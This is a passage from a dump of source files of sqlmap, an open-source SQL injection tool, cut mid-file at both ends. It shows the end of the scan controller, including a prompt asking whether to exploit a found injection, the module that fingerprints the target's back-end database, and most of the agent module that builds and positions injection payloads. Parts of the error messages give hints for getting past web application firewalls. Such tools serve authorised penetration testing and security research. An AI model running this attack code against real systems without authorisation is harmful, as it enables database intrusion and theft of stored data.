parameter)\n                                    logger.warning(warnMsg)\n\n                            finally:\n                                if place == PLACE.COOKIE:\n                                    kb.mergeCookies = popValue()\n\n            if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):\n                if kb.vainRun and not conf.multipleTargets:\n                    errMsg = \"no parameter(s) found for testing in the provided data \"\n                    errMsg += \"(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')\"\n                    if kb.originalPage:\n                        advice = []\n                        if not conf.forms and re.search(r\"<form\", kb.originalPage) is not None:\n                            advice.append(\"--forms\")\n                        if not conf.crawlDepth and re.search(r\"href=[\\\"']/?\\w\", kb.originalPage) is not None:\n                            advice.append(\"--crawl=2\")\n                        if advice:\n                            errMsg += \". You are advised to rerun with '%s'\" % ' '.join(advice)\n                    raise SqlmapNoneDataException(errMsg)\n                else:\n                    errMsg = \"all tested parameters do not appear to be injectable.\"\n\n                    if conf.level < 5 or conf.risk < 3:\n                        errMsg += \" Try to increase values for '--level'/'--risk' options \"\n                        errMsg += \"if you wish to perform more tests.\"\n\n                    if isinstance(conf.technique, list) and len(conf.technique) < 5:\n                        errMsg += \" Rerun without providing the option '--technique'.\"\n\n                    if not conf.textOnly and kb.originalPage:\n                        percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage))\n\n                        if kb.dynamicMarkings:\n                            errMsg += \" You can give it a go with the switch '--text-only' \"\n                            errMsg += \"if the target page has a low percentage \"\n                            errMsg += \"of textual content (~%.2f%% of \" % percent\n                            errMsg += \"page content is text).\"\n                        elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone:\n                            errMsg += \" Please retry with the switch '--text-only' \"\n                            errMsg += \"(along with --technique=BU) as this case \"\n                            errMsg += \"looks like a perfect candidate \"\n                            errMsg += \"(low textual content along with inability \"\n                            errMsg += \"of comparison engine to detect at least \"\n                            errMsg += \"one dynamic parameter).\"\n\n                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:\n                        errMsg += \" As heuristic test turned out positive you are \"\n                        errMsg += \"strongly advised to continue on with the tests.\"\n\n                    if conf.string:\n                        errMsg += \" Also, you can try to rerun by providing a \"\n                        errMsg += \"valid value for option '--string' as perhaps the string you \"\n                        errMsg += \"have chosen does not match \"\n                        errMsg += \"exclusively True responses.\"\n                    elif conf.regexp:\n                        errMsg += \" Also, you can try to rerun by providing a \"\n                        errMsg += \"valid value for option '--regexp' as perhaps the regular \"\n                        errMsg += \"expression that you have chosen \"\n                        errMsg += \"does not match exclusively True responses.\"\n\n                    if not conf.tamper:\n                        errMsg += \" If you suspect that there is some kind of protection mechanism \"\n                        errMsg += \"involved (e.g. WAF) maybe you could try to use \"\n                        errMsg += \"option '--tamper' (e.g. '--tamper=space2comment')\"\n\n                        if not conf.randomAgent:\n                            errMsg += \" and/or switch '--random-agent'\"\n\n                    raise SqlmapNotVulnerableException(errMsg.rstrip('.'))\n            else:\n                # Flush the flag\n                kb.testMode = False\n\n                _saveToResultsFile()\n                _saveToHashDB()\n                _showInjections()\n                _selectInjection()\n\n            if kb.injection.place is not None and kb.injection.parameter is not None:\n                if conf.multipleTargets:\n                    message = \"do you want to exploit this SQL injection? [Y/n] \"\n                    condition = readInput(message, default='Y', boolean=True)\n                else:\n                    condition = True\n\n                if condition:\n                    action()\n\n        except KeyboardInterrupt:\n            if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1):\n                kb.multipleCtrlC = True\n                raise SqlmapUserQuitException(\"user aborted (Ctrl+C was pressed multiple times)\")\n\n            kb.lastCtrlCTime = time.time()\n\n            if conf.multipleTargets:\n                warnMsg = \"user aborted in multiple target mode\"\n                logger.warning(warnMsg)\n\n                message = \"do you want to skip to the next target in list? [Y/n/q]\"\n                choice = readInput(message, default='Y').upper()\n\n                if choice == 'N':\n                    return False\n                elif choice == 'Q':\n                    raise SqlmapUserQuitException\n            else:\n                raise\n\n        except SqlmapSkipTargetException:\n            pass\n\n        except SqlmapUserQuitException:\n            raise\n\n        except SqlmapSilentQuitException:\n            raise\n\n        except SqlmapBaseException as ex:\n            errMsg = getSafeExString(ex)\n\n            if conf.multipleTargets:\n                _saveToResultsFile()\n\n                errMsg += \", skipping to the next target\"\n                logger.error(errMsg.lstrip(\", \"))\n            else:\n                logger.critical(errMsg)\n                return False\n\n        finally:\n            showHttpErrorCodes()\n\n            if kb.maxConnectionsFlag:\n                warnMsg = \"it appears that the target \"\n                warnMsg += \"has a maximum connections \"\n                warnMsg += \"constraint\"\n                logger.warning(warnMsg)\n\n    if kb.dataOutputFlag and not conf.multipleTargets:\n        logger.info(\"fetched data logged to text files under '%s'\" % conf.outputPath)\n\n    if conf.multipleTargets:\n        if conf.resultsFile:\n            infoMsg = \"you can find results of scanning in multiple targets \"\n            infoMsg += \"mode inside the CSV file '%s'\" % conf.resultsFile\n            logger.info(infoMsg)\n\n    return True\n"
  },
  {
    "path": "sqlmap/lib/controller/handler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.dicts import DBMS_DICT\nfrom lib.core.enums import DBMS\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.settings import ACCESS_ALIASES\nfrom lib.core.settings import ALTIBASE_ALIASES\nfrom lib.core.settings import CACHE_ALIASES\nfrom lib.core.settings import CRATEDB_ALIASES\nfrom lib.core.settings import CUBRID_ALIASES\nfrom lib.core.settings import DB2_ALIASES\nfrom lib.core.settings import DERBY_ALIASES\nfrom lib.core.settings import EXTREMEDB_ALIASES\nfrom lib.core.settings import FIREBIRD_ALIASES\nfrom lib.core.settings import FRONTBASE_ALIASES\nfrom lib.core.settings import H2_ALIASES\nfrom lib.core.settings import HSQLDB_ALIASES\nfrom lib.core.settings import INFORMIX_ALIASES\nfrom lib.core.settings import MAXDB_ALIASES\nfrom lib.core.settings import MCKOI_ALIASES\nfrom lib.core.settings import MIMERSQL_ALIASES\nfrom lib.core.settings import MONETDB_ALIASES\nfrom lib.core.settings import MSSQL_ALIASES\nfrom lib.core.settings import MYSQL_ALIASES\nfrom lib.core.settings import ORACLE_ALIASES\nfrom lib.core.settings import PGSQL_ALIASES\nfrom lib.core.settings import PRESTO_ALIASES\nfrom lib.core.settings import RAIMA_ALIASES\nfrom lib.core.settings import SQLITE_ALIASES\nfrom lib.core.settings import SYBASE_ALIASES\nfrom lib.core.settings import VERTICA_ALIASES\nfrom lib.core.settings import VIRTUOSO_ALIASES\nfrom lib.utils.sqlalchemy import SQLAlchemy\n\nfrom plugins.dbms.access.connector import Connector as AccessConn\nfrom plugins.dbms.access import AccessMap\nfrom plugins.dbms.altibase.connector import Connector as AltibaseConn\nfrom plugins.dbms.altibase import AltibaseMap\nfrom plugins.dbms.cache.connector import Connector as CacheConn\nfrom plugins.dbms.cache import CacheMap\nfrom plugins.dbms.cratedb.connector import Connector as CrateDBConn\nfrom plugins.dbms.cratedb import CrateDBMap\nfrom plugins.dbms.cubrid.connector import Connector as CubridConn\nfrom plugins.dbms.cubrid import CubridMap\nfrom plugins.dbms.db2.connector import Connector as DB2Conn\nfrom plugins.dbms.db2 import DB2Map\nfrom plugins.dbms.derby.connector import Connector as DerbyConn\nfrom plugins.dbms.derby import DerbyMap\nfrom plugins.dbms.extremedb.connector import Connector as ExtremeDBConn\nfrom plugins.dbms.extremedb import ExtremeDBMap\nfrom plugins.dbms.firebird.connector import Connector as FirebirdConn\nfrom plugins.dbms.firebird import FirebirdMap\nfrom plugins.dbms.frontbase.connector import Connector as FrontBaseConn\nfrom plugins.dbms.frontbase import FrontBaseMap\nfrom plugins.dbms.h2.connector import Connector as H2Conn\nfrom plugins.dbms.h2 import H2Map\nfrom plugins.dbms.hsqldb.connector import Connector as HSQLDBConn\nfrom plugins.dbms.hsqldb import HSQLDBMap\nfrom plugins.dbms.informix.connector import Connector as InformixConn\nfrom plugins.dbms.informix import InformixMap\nfrom plugins.dbms.maxdb.connector import Connector as MaxDBConn\nfrom plugins.dbms.maxdb import MaxDBMap\nfrom plugins.dbms.mckoi.connector import Connector as MckoiConn\nfrom plugins.dbms.mckoi import MckoiMap\nfrom plugins.dbms.mimersql.connector import Connector as MimerSQLConn\nfrom plugins.dbms.mimersql import MimerSQLMap\nfrom plugins.dbms.monetdb.connector import Connector as MonetDBConn\nfrom plugins.dbms.monetdb import MonetDBMap\nfrom plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn\nfrom plugins.dbms.mssqlserver import MSSQLServerMap\nfrom plugins.dbms.mysql.connector import Connector as MySQLConn\nfrom plugins.dbms.mysql import MySQLMap\nfrom plugins.dbms.oracle.connector import Connector as OracleConn\nfrom plugins.dbms.oracle import OracleMap\nfrom plugins.dbms.postgresql.connector import Connector as PostgreSQLConn\nfrom plugins.dbms.postgresql import PostgreSQLMap\nfrom plugins.dbms.presto.connector import Connector as PrestoConn\nfrom plugins.dbms.presto import PrestoMap\nfrom plugins.dbms.raima.connector import Connector as RaimaConn\nfrom plugins.dbms.raima import RaimaMap\nfrom plugins.dbms.sqlite.connector import Connector as SQLiteConn\nfrom plugins.dbms.sqlite import SQLiteMap\nfrom plugins.dbms.sybase.connector import Connector as SybaseConn\nfrom plugins.dbms.sybase import SybaseMap\nfrom plugins.dbms.vertica.connector import Connector as VerticaConn\nfrom plugins.dbms.vertica import VerticaMap\nfrom plugins.dbms.virtuoso.connector import Connector as VirtuosoConn\nfrom plugins.dbms.virtuoso import VirtuosoMap\n\ndef setHandler():\n    \"\"\"\n    Detect which is the target web application back-end database\n    management system.\n    \"\"\"\n\n    items = [\n        (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),\n        (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),\n        (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),\n        (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),\n        (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),\n        (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),\n        (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),\n        (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),\n        (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),\n        (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),\n        (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),\n        (DBMS.H2, H2_ALIASES, H2Map, H2Conn),\n        (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),\n        (DBMS.MONETDB, MONETDB_ALIASES, MonetDBMap, MonetDBConn),\n        (DBMS.DERBY, DERBY_ALIASES, DerbyMap, DerbyConn),\n        (DBMS.VERTICA, VERTICA_ALIASES, VerticaMap, VerticaConn),\n        (DBMS.MCKOI, MCKOI_ALIASES, MckoiMap, MckoiConn),\n        (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),\n        (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),\n        (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),\n        (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),\n        (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),\n        (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),\n        (DBMS.EXTREMEDB, EXTREMEDB_ALIASES, ExtremeDBMap, ExtremeDBConn),\n        (DBMS.FRONTBASE, FRONTBASE_ALIASES, FrontBaseMap, FrontBaseConn),\n        (DBMS.RAIMA, RAIMA_ALIASES, RaimaMap, RaimaConn),\n        (DBMS.VIRTUOSO, VIRTUOSO_ALIASES, VirtuosoMap, VirtuosoConn),\n    ]\n\n    _ = max(_ if (conf.get(\"dbms\") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or \"\").lower() in _[1] else () for _ in items)\n    if _:\n        items.remove(_)\n        items.insert(0, _)\n\n    for dbms, aliases, Handler, Connector in items:\n        if conf.forceDbms:\n            if conf.forceDbms.lower() not in aliases:\n                continue\n            else:\n                kb.dbms = conf.dbms = conf.forceDbms = dbms\n\n        if kb.dbmsFilter:\n            if dbms not in kb.dbmsFilter:\n                continue\n\n        handler = Handler()\n        conf.dbmsConnector = Connector()\n\n        if conf.direct:\n            exception = None\n            dialect = DBMS_DICT[dbms][3]\n\n            if dialect:\n                try:\n                    sqlalchemy = SQLAlchemy(dialect=dialect)\n                    sqlalchemy.connect()\n\n                    if sqlalchemy.connector:\n                        conf.dbmsConnector = sqlalchemy\n                except Exception as ex:\n                    exception = ex\n\n            if not dialect or exception:\n                try:\n                    conf.dbmsConnector.connect()\n                except Exception as ex:\n                    if exception:\n                        raise exception\n                    else:\n                        if not isinstance(ex, NameError):\n                            raise\n                        else:\n                            msg = \"support for direct connection to '%s' is not available. \" % dbms\n                            msg += \"Please rerun with '--dependencies'\"\n                            raise SqlmapConnectionException(msg)\n\n        if conf.forceDbms == dbms or handler.checkDbms():\n            if kb.resolutionDbms:\n                conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()\n                conf.dbmsHandler._dbms = kb.resolutionDbms\n            else:\n                conf.dbmsHandler = handler\n                conf.dbmsHandler._dbms = dbms\n\n            break\n        else:\n            conf.dbmsConnector = None\n\n    # At this point back-end DBMS is correctly fingerprinted, no need\n    # to enforce it anymore\n    Backend.flushForcedDbms()\n"
  },
  {
    "path": "sqlmap/lib/core/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/core/agent.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import filterNone\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import getTechnique\nfrom lib.core.common import getTechniqueData\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import isDBMSVersionAtLeast\nfrom lib.core.common import isNumber\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import splitFields\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import urlencode\nfrom lib.core.common import zeroDepthSearch\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeBase64\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import queries\nfrom lib.core.dicts import DUMP_DATA_PREPROCESS\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import POST_HINT\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import BOUNDED_BASE64_MARKER\nfrom lib.core.settings import BOUNDARY_BACKSLASH_MARKER\nfrom lib.core.settings import BOUNDED_INJECTION_MARKER\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import GENERIC_SQL_COMMENT\nfrom lib.core.settings import GENERIC_SQL_COMMENT_MARKER\nfrom lib.core.settings import INFERENCE_MARKER\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PAYLOAD_DELIMITER\nfrom lib.core.settings import REPLACEMENT_MARKER\nfrom lib.core.settings import SINGLE_QUOTE_MARKER\nfrom lib.core.settings import SLEEP_TIME_MARKER\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.unescaper import unescaper\nfrom thirdparty import six\n\nclass Agent(object):\n    \"\"\"\n    This class defines the SQL agent methods.\n    \"\"\"\n\n    def payloadDirect(self, query):\n        query = self.cleanupPayload(query)\n\n        if query.upper().startswith(\"AND \"):\n            query = re.sub(r\"(?i)AND \", \"SELECT \", query, 1)\n        elif query.upper().startswith(\" UNION ALL \"):\n            query = re.sub(r\"(?i) UNION ALL \", \"\", query, 1)\n        elif query.startswith(\"; \"):\n            query = query.replace(\"; \", \"\", 1)\n\n        if Backend.getIdentifiedDbms() in (DBMS.ORACLE,):  # non-standard object(s) make problems to a database connector while returned (e.g. XMLTYPE)\n            _, _, _, _, _, _, fieldsToCastStr, _ = self.getFields(query)\n            for field in fieldsToCastStr.split(','):\n                query = query.replace(field, self.nullAndCastField(field))\n\n        if kb.tamperFunctions:\n            for function in kb.tamperFunctions:\n                query = function(payload=query)\n\n        return query\n\n    def payload(self, place=None, parameter=None, value=None, newValue=None, where=None):\n        \"\"\"\n        This method replaces the affected parameter with the SQL\n        injection statement to request\n        \"\"\"\n\n        if conf.direct:\n            return self.payloadDirect(newValue)\n\n        retVal = \"\"\n\n        if kb.forceWhere:\n            where = kb.forceWhere\n        elif where is None and isTechniqueAvailable(getTechnique()):\n            where = getTechniqueData().where\n\n        if kb.injection.place is not None:\n            place = kb.injection.place\n\n        if kb.injection.parameter is not None:\n            parameter = kb.injection.parameter\n\n        paramString = conf.parameters[place]\n        paramDict = conf.paramDict[place]\n        origValue = getUnicode(paramDict[parameter])\n        newValue = getUnicode(newValue) if newValue else newValue\n        base64Encoding = re.sub(r\" \\(.+\", \"\", parameter) in conf.base64Parameter\n\n        if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:\n            paramString = origValue\n            if place == PLACE.URI:\n                origValue = origValue.split(kb.customInjectionMark)[0]\n            else:\n                origValue = filterNone(re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r\"\\w+\\Z\", r\"[^\\\"'><]+\\Z\", r\"[^ ]+\\Z\"))[0].group(0)\n            origValue = origValue[origValue.rfind('/') + 1:]\n            for char in ('?', '=', ':', ',', '&'):\n                if char in origValue:\n                    origValue = origValue[origValue.rfind(char) + 1:]\n        elif place == PLACE.CUSTOM_POST:\n            paramString = origValue\n            origValue = origValue.split(kb.customInjectionMark)[0]\n            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):\n                origValue = re.split(r\"['\\\">]\", origValue)[-1]\n            elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):\n                match = re.search(r\"['\\\"]\", origValue)\n                quote = match.group(0) if match else '\"'\n                origValue = extractRegexResult(r\"%s\\s*:\\s*(?P<result>\\d+)\\Z\" % quote, origValue) or extractRegexResult(r\"(?P<result>[^%s]*)\\Z\" % quote, origValue)\n            else:\n                _ = extractRegexResult(r\"(?s)(?P<result>[^\\s<>{}();'\\\"&]+\\Z)\", origValue) or \"\"\n                origValue = _.split('=', 1)[1] if '=' in _ else _\n        elif place == PLACE.CUSTOM_HEADER:\n            paramString = origValue\n            origValue = origValue[origValue.find(',') + 1:]\n            origValue = origValue.split(kb.customInjectionMark)[0]\n            match = re.search(r\"([^;]+)=(?P<value>[^;]*);?\\Z\", origValue)\n            if match:\n                origValue = match.group(\"value\")\n            elif ',' in paramString:\n                header = paramString.split(',')[0]\n\n                if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():\n                    origValue = origValue.split(' ')[-1].split(':')[-1]\n\n        origValue = origValue or \"\"\n\n        if value is None:\n            if where == PAYLOAD.WHERE.ORIGINAL:\n                value = origValue\n            elif where == PAYLOAD.WHERE.NEGATIVE:\n                if conf.invalidLogical:\n                    match = re.search(r\"\\A[^ ]+\", newValue)\n                    newValue = newValue[len(match.group() if match else \"\"):]\n                    _ = randomInt(2)\n                    value = \"%s%s AND %s LIKE %s\" % (origValue, match.group() if match else \"\", _, _ + 1)\n                elif conf.invalidBignum:\n                    value = randomInt(6)\n                elif conf.invalidString:\n                    value = randomStr(6)\n                else:\n                    if newValue.startswith(\"-\"):\n                        value = \"\"\n                    else:\n                        value = \"-%s\" % randomInt()\n            elif where == PAYLOAD.WHERE.REPLACE:\n                value = \"\"\n            else:\n                value = origValue\n\n            newValue = \"%s%s\" % (value, newValue)\n\n        newValue = self.cleanupPayload(newValue, origValue) or \"\"\n\n        if base64Encoding:\n            _newValue = newValue\n            _origValue = origValue\n\n            if newValue:\n                newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\\\')\n                newValue = self.adjustLateValues(newValue)\n\n            # TODO: support for POST_HINT\n            newValue = \"%s%s%s\" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER)\n\n            if parameter in kb.base64Originals:\n                origValue = kb.base64Originals[parameter]\n            else:\n                origValue = encodeBase64(origValue, binary=False, encoding=conf.encoding or UNICODE_ENCODING)\n\n        if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):\n            _ = \"%s%s\" % (origValue, kb.customInjectionMark)\n\n            if kb.postHint == POST_HINT.JSON and isNumber(origValue) and not isNumber(newValue) and '\"%s\"' % _ not in paramString:\n                newValue = '\"%s\"' % self.addPayloadDelimiters(newValue)\n            elif kb.postHint == POST_HINT.JSON_LIKE and isNumber(origValue) and not isNumber(newValue) and re.search(r\"['\\\"]%s['\\\"]\" % re.escape(_), paramString) is None:\n                newValue = \"'%s'\" % self.addPayloadDelimiters(newValue)\n            else:\n                newValue = self.addPayloadDelimiters(newValue)\n\n            if newValue:\n                newValue = newValue.replace(kb.customInjectionMark, REPLACEMENT_MARKER)\n                retVal = paramString.replace(_, newValue)\n\n            retVal = retVal.replace(kb.customInjectionMark, \"\").replace(REPLACEMENT_MARKER, kb.customInjectionMark)\n        elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:\n            if base64Encoding:\n                retVal = paramString.replace(\"%s%s\" % (_origValue, BOUNDED_INJECTION_MARKER), _newValue)\n                match = re.search(r\"(%s)=([^&]*)\" % re.sub(r\" \\(.+\", \"\", parameter), retVal)\n                if match:\n                    retVal = retVal.replace(match.group(0), \"%s=%s\" % (match.group(1), encodeBase64(match.group(2), binary=False, encoding=conf.encoding or UNICODE_ENCODING)))\n            else:\n                retVal = paramString.replace(\"%s%s\" % (origValue, BOUNDED_INJECTION_MARKER), self.addPayloadDelimiters(newValue))\n        elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):\n            retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))\n        else:\n            def _(pattern, repl, string):\n                retVal = string\n                match = None\n                for match in re.finditer(pattern, string):\n                    pass\n\n                if match:\n                    while True:\n                        _ = re.search(r\"\\\\g<([^>]+)>\", repl)\n                        if _:\n                            try:\n                                repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))\n                            except IndexError:\n                                break\n                        else:\n                            break\n                    retVal = string[:match.start()] + repl + string[match.end():]\n                return retVal\n\n            if origValue:\n                regex = r\"(\\A|\\b)%s=%s%s\" % (re.escape(parameter), re.escape(origValue), r\"(\\Z|\\b)\" if origValue[-1].isalnum() else \"\")\n                retVal = _(regex, \"%s=%s\" % (parameter, self.addPayloadDelimiters(newValue)), paramString)\n            else:\n                retVal = _(r\"(\\A|\\b)%s=%s(\\Z|%s|%s|\\s)\" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r\"%s=%s\\g<2>\" % (parameter, self.addPayloadDelimiters(newValue)), paramString)\n\n            if retVal == paramString and urlencode(parameter) != parameter:\n                retVal = _(r\"(\\A|\\b)%s=%s\" % (re.escape(urlencode(parameter)), re.escape(origValue)), \"%s=%s\" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)\n\n        if retVal:\n            retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\\\')\n\n        return retVal\n\n    def prefixQuery(self, expression, prefix=None, where=None, clause=None):\n        \"\"\"\n        This method defines how the input expression has to be escaped\n        to perform the injection depending on the injection type\n        identified as valid\n        \"\"\"\n\n        if conf.direct:\n            return self.payloadDirect(expression)\n\n        if expression is None:\n            return None\n\n        expression = self.cleanupPayload(expression)\n        expression = unescaper.escape(expression)\n        query = None\n\n        if where is None and getTechnique() is not None and getTechnique() in kb.injection.data:\n            where = getTechniqueData().where\n\n        # If we are replacing (<where>) the parameter original value with\n        # our payload do not prepend with the prefix\n        if where == PAYLOAD.WHERE.REPLACE and not conf.prefix:  # Note: https://github.com/sqlmapproject/sqlmap/issues/4030\n            query = \"\"\n\n        # If the technique is stacked queries (<stype>) do not put a space\n        # after the prefix or it is in GROUP BY / ORDER BY (<clause>)\n        elif getTechnique() == PAYLOAD.TECHNIQUE.STACKED:\n            query = kb.injection.prefix\n        elif kb.injection.clause == [2, 3] or kb.injection.clause == [2] or kb.injection.clause == [3]:\n            query = kb.injection.prefix\n        elif clause == [2, 3] or clause == [2] or clause == [3]:\n            query = prefix\n\n        # In any other case prepend with the full prefix\n        else:\n            query = kb.injection.prefix or prefix or \"\"\n\n            if \"SELECT '[RANDSTR]'\" in query:  # escaping of pre-WHERE prefixes\n                query = query.replace(\"'[RANDSTR]'\", unescaper.escape(randomStr(), quote=False))\n\n            if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):\n                query += \" \"\n\n        query = \"%s%s\" % ((query or \"\").replace('\\\\', BOUNDARY_BACKSLASH_MARKER), expression)\n\n        return query\n\n    def suffixQuery(self, expression, comment=None, suffix=None, where=None, trimEmpty=True):\n        \"\"\"\n        This method appends the DBMS comment to the\n        SQL injection request\n        \"\"\"\n\n        if conf.direct:\n            return self.payloadDirect(expression)\n\n        if expression is None:\n            return None\n\n        expression = self.cleanupPayload(expression)\n\n        # Take default values if None\n        suffix = kb.injection.suffix if kb.injection and suffix is None else suffix\n\n        if getTechnique() is not None and getTechnique() in kb.injection.data:\n            where = getTechniqueData().where if where is None else where\n            comment = getTechniqueData().comment if comment is None else comment\n\n        if any((comment or \"\").startswith(_) for _ in (\"--\", GENERIC_SQL_COMMENT_MARKER)):\n            if Backend.getIdentifiedDbms() and not GENERIC_SQL_COMMENT.startswith(queries[Backend.getIdentifiedDbms()].comment.query):\n                comment = queries[Backend.getIdentifiedDbms()].comment.query\n\n        if comment is not None:\n            expression += comment\n\n        # If we are replacing (<where>) the parameter original value with\n        # our payload do not append the suffix\n        if where == PAYLOAD.WHERE.REPLACE and not conf.suffix:\n            pass\n\n        elif suffix and not comment:\n            if re.search(r\"\\w\\Z\", expression) and re.search(r\"\\A\\w\", suffix):\n                expression += \" \"\n\n            expression += suffix.replace('\\\\', BOUNDARY_BACKSLASH_MARKER)\n\n        return re.sub(r\";\\W*;\", \";\", expression) if trimEmpty else expression\n\n    def cleanupPayload(self, payload, origValue=None):\n        if not isinstance(payload, six.string_types):\n            return\n\n        replacements = {\n            \"[DELIMITER_START]\": kb.chars.start,\n            \"[DELIMITER_STOP]\": kb.chars.stop,\n            \"[AT_REPLACE]\": kb.chars.at,\n            \"[SPACE_REPLACE]\": kb.chars.space,\n            \"[DOLLAR_REPLACE]\": kb.chars.dollar,\n            \"[HASH_REPLACE]\": kb.chars.hash_,\n            \"[GENERIC_SQL_COMMENT]\": GENERIC_SQL_COMMENT\n        }\n\n        for value in re.findall(r\"\\[[A-Z_]+\\]\", payload):\n            if value in replacements:\n                payload = payload.replace(value, replacements[value])\n\n        for _ in set(re.findall(r\"(?i)\\[RANDNUM(?:\\d+)?\\]\", payload)):\n            payload = payload.replace(_, str(randomInt()))\n\n        for _ in set(re.findall(r\"(?i)\\[RANDSTR(?:\\d+)?\\]\", payload)):\n            payload = payload.replace(_, randomStr())\n\n        if origValue is not None:\n            origValue = getUnicode(origValue)\n\n            if \"[ORIGVALUE]\" in payload:\n                payload = getUnicode(payload).replace(\"[ORIGVALUE]\", origValue if origValue.isdigit() else unescaper.escape(\"'%s'\" % origValue))\n            if \"[ORIGINAL]\" in payload:\n                payload = getUnicode(payload).replace(\"[ORIGINAL]\", origValue)\n\n        if INFERENCE_MARKER in payload:\n            if Backend.getIdentifiedDbms() is not None:\n                inference = queries[Backend.getIdentifiedDbms()].inference\n\n                if \"dbms_version\" in inference:\n                    if isDBMSVersionAtLeast(inference.dbms_version):\n                        inferenceQuery = inference.query\n                    else:\n                        inferenceQuery = inference.query2\n                else:\n                    inferenceQuery = inference.query\n\n                payload = payload.replace(INFERENCE_MARKER, inferenceQuery)\n\n            elif not kb.testMode:\n                errMsg = \"invalid usage of inference payload without \"\n                errMsg += \"knowledge of underlying DBMS\"\n                raise SqlmapNoneDataException(errMsg)\n\n        return payload\n\n    def adjustLateValues(self, payload):\n        \"\"\"\n        Returns payload with a replaced late tags (e.g. SLEEPTIME)\n        \"\"\"\n\n        if payload:\n            for match in re.finditer(r\"(?s)%s(.*?)%s\" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload):\n                _ = encodeBase64(match.group(1), binary=False, encoding=conf.encoding or UNICODE_ENCODING, safe=conf.base64Safe)\n                payload = payload.replace(match.group(0), _)\n\n            payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))\n            payload = payload.replace(SINGLE_QUOTE_MARKER, 